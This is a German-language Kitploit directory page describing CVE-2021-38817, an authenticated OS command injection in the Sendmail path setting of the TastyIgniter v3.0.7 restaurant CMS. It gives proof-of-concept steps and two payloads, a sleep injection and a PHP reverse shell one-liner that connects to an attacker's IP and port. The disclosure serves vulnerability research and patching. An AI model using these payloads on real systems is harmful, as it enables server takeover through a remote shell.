Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-38817-Remote-OS-Command-Injection — Remote-OS-Kommandoinjektion im Sendmail-Pfadfeld von TastyIgniter v3.0.7 | Kitploit
Tools/GitHubGitHub/huskyhacks/cve-2021-38817-remote-os-command-injection
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlPayload-Entwicklung
GitHubhuskyhacks/cve-2021-38817-remote-os-command-injection

CVE-2021-38817-Remote-OS-Command-Injection

Remote-OS-Kommandoinjektion im Sendmail-Pfadfeld von TastyIgniter v3.0.7

Repository anzeigen
9241vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-38817-Remote-OS-Befehlseinschleusung

Authentifizierte Remote-OS-Befehlseinschleusung/Fernausführung von Code im TastyIgniter v3.0.7 Sendmail-Webteil (CVE-2021-38817)

Eine anfällige authentifizierte Remote-OS-Befehlseinschleusung existiert im TastyIgniter v3.0.7 Restaurant-CMS-Sendmail-Konfigurationsmenü der Webanwendung. Der Parameter 'Sendmail Path' wird nicht ordnungsgemäß bereinigt, wie durch den im Feld eingetragenen Befehl /usr/sbin/sendmail -bs angezeigt, und ermöglicht das Einschleusen beliebiger Befehle durch Hinzufügen eines Semikolons und eines zusätzlichen OS-Befehls.

Betroffene Komponenten

URL: /admin/settings/edit/mail

Feld:

  • Mail-Protokoll: Sendmail
  • Feld: Sendmail-Pfad

POC

  • Melden Sie sich mit Anmeldedaten im /admin-Portal an.
  • Navigieren Sie zu /admin/settings/edit/mail
  • Wählen Sie im Dropdown-Menü Mail-Protokoll die Option Sendmail aus.
  • Fügen Sie im neuen Feld SendMail Path ein Semikolon und einen beliebigen OS-Befehl hinzu, z. B. /usr/sbin/sendmail -bs; sleep 10
  • Nutzlasten

    • /usr/sbin/sendmail -bs; sleep 10
    • /usr/sbin/sendmail -bs; php -r '$sock=fsockopen("[IP]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'

    TastyIgniterCVE

    Entdeckt von

    Matt Kiely (HuskyHacks) und Mike Padrick (Fearless), August 2021

    CVE zugewiesen im Okt. 2022 (lmfao)

    Tool herunterladen